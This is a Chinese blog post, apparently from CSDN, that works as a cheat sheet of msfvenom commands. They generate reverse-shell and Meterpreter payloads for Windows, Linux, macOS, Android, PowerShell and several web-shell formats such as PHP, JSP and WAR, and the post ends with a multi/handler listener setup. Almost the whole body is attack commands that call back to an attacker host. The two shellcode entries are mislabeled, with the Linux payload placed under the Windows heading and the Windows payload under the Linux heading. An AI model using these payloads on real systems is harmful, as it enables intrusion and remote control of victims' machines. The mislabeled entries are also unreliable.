当前位置:网站首页>msf生成payload大全
msf生成payload大全
2022-07-06 09:22:00 【不知名白帽】
目录
资源
msf生成payload大全_不知名白帽的博客-CSDN博客
一、payload
1.windwos
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f exe > shell.exe
2.liunx
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f elf > shell.elf
3.mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f macho > shell.macho
4.android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 R > test.apk
5.Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
6.shellcode(windwos)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f c
7.shellcode(liunx)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f c
8.shellcode(mac)
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c
二、反弹shell
1.python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py
2.bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.20.128 LPORT=4444 -f raw > shell.sh
3.Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.20.128 LPORT=4444 -f raw > shell.pl
4.Lua
msfvenom -p cmd/unix/reverse_lua LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.lua
5.Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.rb
6.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
7.aspx
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f aspx -o shell.aspx
8.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f asp > shell.asp
9.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.jsp
10.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war > shell.war
11.nodejs
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.js
三、监听
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.20.128
set LPORT 4444
show options #查漏补缺
exploit
边栏推荐
- 7-11 mechanic mustadio (PTA program design)
- 7-6 矩阵的局部极小值(PTA程序设计)
- [insert, modify and delete data in the headsong educator data table]
- Detailed explanation of redis' distributed lock principle
- Which is more advantageous in short-term or long-term spot gold investment?
- Leetcode. 3. Longest substring without repeated characters - more than 100% solution
- 7-9 制作门牌号3.0(PTA程序设计)
- 实验六 继承和多态
- [err] 1055 - expression 1 of order by clause is not in group by clause MySQL
- 深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
猜你喜欢
强化学习基础记录
Hackmyvm target series (3) -visions
Safe driving skills on ice and snow roads
MySQL lock summary (comprehensive and concise + graphic explanation)
MATLAB打开.m文件乱码解决办法
【VMware异常问题】问题分析&解决办法
How to turn wechat applet into uniapp
FAQs and answers to the imitation Niuke technology blog project (I)
Hackmyvm target series (5) -warez
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
随机推荐
This time, thoroughly understand the MySQL index
浅谈漏洞发现思路
Why use redis
. Net6: develop modern 3D industrial software based on WPF (2)
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
.Xmind文件如何上传金山文档共享在线编辑?
【MySQL数据库的学习】
Experiment 9 input and output stream (excerpt)
Leetcode. 3. Longest substring without repeated characters - more than 100% solution
7-11 机工士姆斯塔迪奥(PTA程序设计)
实验四 数组
[data processing of numpy and pytoch]
HackMyvm靶機系列(3)-visions
1143_ SiCp learning notes_ Tree recursion
[MySQL table structure and integrity constraint modification (Alter)]
PriorityQueue (large root heap / small root heap /topk problem)
Nuxtjs快速上手(Nuxt2)
Relationship between hashcode() and equals()
xray與burp聯動 挖掘
Meituan dynamic thread pool practice ideas, open source